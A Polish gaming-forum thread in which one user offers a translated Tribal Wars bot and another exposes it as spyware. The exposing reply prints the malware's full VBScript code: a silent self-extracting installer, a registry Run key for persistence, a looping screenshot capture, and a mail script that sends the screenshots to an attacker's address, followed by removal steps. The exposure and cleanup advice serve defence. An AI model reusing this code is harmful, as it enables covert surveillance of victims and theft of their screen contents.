Skocz do zawartości

  • 👋 Witaj na MPCForum!

    Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

    • Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

    👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

    Zarejestruj się teraz

Plemiona bot by warrior87

TheBananMen

Przez TheBananMen
w Kosz

Rekomendowane odpowiedzi

TheBananMen Nowicjusz

TheBananMen

Opublikowano
Nowicjusz

TheBananMen

Opublikowano

Witam.
Zapewne wielu z was chciało mieć takiego bota.
Znalazłem takiego bota i przetłumaczyłem. Po pobraniu wystarczy odpalić plik TribalBot.bat. Plik jest w formacie bat, ponieważ jak pisał autor 'compilation sucks

Jeśli ktoś myśli, że to plik .bat, który sformatuje wam dysk niech kliknie LPM i Edytuj. Wszystko działa i jest OK :)

x

Phoenix_PL Weteran

Phoenix_PL

Opublikowano
Weteran

Phoenix_PL

Opublikowano

To syf robiący screeny i wysyłający je gdzieś z danymi, do utylizacji, migiem.

Dowody:
1. Samoinstalujący się sfx winrara:

;Poniższy komentarz zawiera skrypt SFX

Silent=1
Overwrite=1
Setup=regadd.vbe
Setup=screen.vbe
Path=%tmp%\gg

Program się instaluje i wysyła emaile ze screenami na pocztę :)
Dumpnięte skrypty, ktoś myślał że kompilacja to jakiekolwiek zabezpieczenie:

regadd.vbs:

Dim oShell 
Set oShell = WScript.CreateObject ("WSCript.shell") 
On Error Resume Next
oShell.run "cmd /C reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v vbe /d %tmp%\gg\screen.vbe",0 
Set oShell = Nothing
Set objApp = CreateObject("WScript.Shell") 
objApp.Run "cmd.exe /c " & Chr(34) & "mkdir %tmp%\gg" & Chr(34),0
Set oShell = Nothing

 

 

screen.vbs:

Do
Dim oShell, WshShell, WshEnvironment 
Set WshShell = _ 
WScript.CreateObject("WScript.Shell") 
Set WshEnvironment = _ 
WshShell.Environment("Process") 
WshShell.ExpandEnvironmentStrings("%WINDIR%") 

Set oShell = WScript.CreateObject ("WSCript.shell")
On Error Resume Next
Wscript.Sleep(3000) 
oShell.run "cmd /C %tmp%\gg\nircmd.exe savescreenshot %tmp%\gg\screen.jpg",0 
Set oShell = Nothing 
Set oShell = WScript.CreateObject ("WSCript.shell")
oShell.run "cmd /C %tmp%\gg\send.vbe",0 
Set oShell = Nothing
Loop

 

 

i najciekawszy send.vbs:

Const cdoSendUsingPickup = 1 'Send message using the local SMTP service pickup directory. 
Const cdoSendUsingPort = 2 'Send the message using the network (SMTP over the network). 

Const cdoAnonymous = 0 'Do not authenticate 
Const cdoBasic = 1 'basic (clear-text) authentication 
Const cdoNTLM = 2 'NTLM 
Dim WshShell, WshEnvironment, objMessage 
Set WshShell = _ 
WScript.CreateObject("WScript.Shell") 
Set WshEnvironment = _ 
WshShell.Environment("Process") 
WshShell.ExpandEnvironmentStrings("%WINDIR%") 
On Error Resume Next

Set objMessage = CreateObject("CDO.Message") 

objMessage.From = """monitoring"" <[email protected]>" 

objMessage.To = "[email protected]" 
objMessage.TextBody = "Witaj administratorze" & vbCRLF & "Oto twoj zalacznik ;)" 
Wscript.Sleep(5000) 
objMessage.AddAttachment WshShell.ExpandEnvironmentStrings("%tmp%\gg\screen.jpg") 

objMessage.Configuration.Fields.Item _ 
("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2 

'Name or IP of Remote SMTP Server 
objMessage.Configuration.Fields.Item _ 
("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "poczta.interia.pl" 

'Type of authentication, NONE, Basic (Base64 encoded), NTLM 
objMessage.Configuration.Fields.Item _ 
("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = cdoBasic 
: 
'Your UserID on the SMTP server 
objMessage.Configuration.Fields.Item _ 
("http://schemas.microsoft.com/cdo/configuration/sendusername") = "[email protected]" 

'Your password on the SMTP server 
objMessage.Configuration.Fields.Item _ 
("http://schemas.microsoft.com/cdo/configuration/sendpassword") = "mati123" 

'Server port (typically 25) 
objMessage.Configuration.Fields.Item _ 
("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 587 

'Use SSL for the connection (False or True) 
objMessage.Configuration.Fields.Item _ 
("http://schemas.microsoft.com/cdo/configuration/smtpusessl") = False 

'Connection Timeout in seconds (the maximum time CDO will try to establish a connection to the SMTP server) 
objMessage.Configuration.Fields.Item _ 
("http://schemas.microsoft.com/cdo/configuration/smtpconnectiontimeout") = 60 

objMessage.Configuration.Fields.Update 

'==End remote SMTP server configuration section== 

objMessage.Send

 

 

Jak ktoś już to odpalił to niech wywali z rejestru klucz HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\vbe a potem zresetuje kompa i usunie folder gg z Temp (Start -> Uruchom albo klawisze Windows+R, wpisujesz %tmp%, enter, szukasz i usuwasz folder gg, problem zniknie.

846331404756772371599.jpeg

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

Tematy
×
×
  • Dodaj nową pozycję...